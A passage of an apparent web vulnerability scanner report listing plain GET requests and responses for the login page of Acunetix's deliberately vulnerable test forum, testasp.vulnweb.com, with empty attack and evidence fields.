</div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:55 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=22 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:55 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:55 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=24 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:55 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=25 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:56 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=26 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:56 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=27 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:56 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=28 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:57 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=29 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:57 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
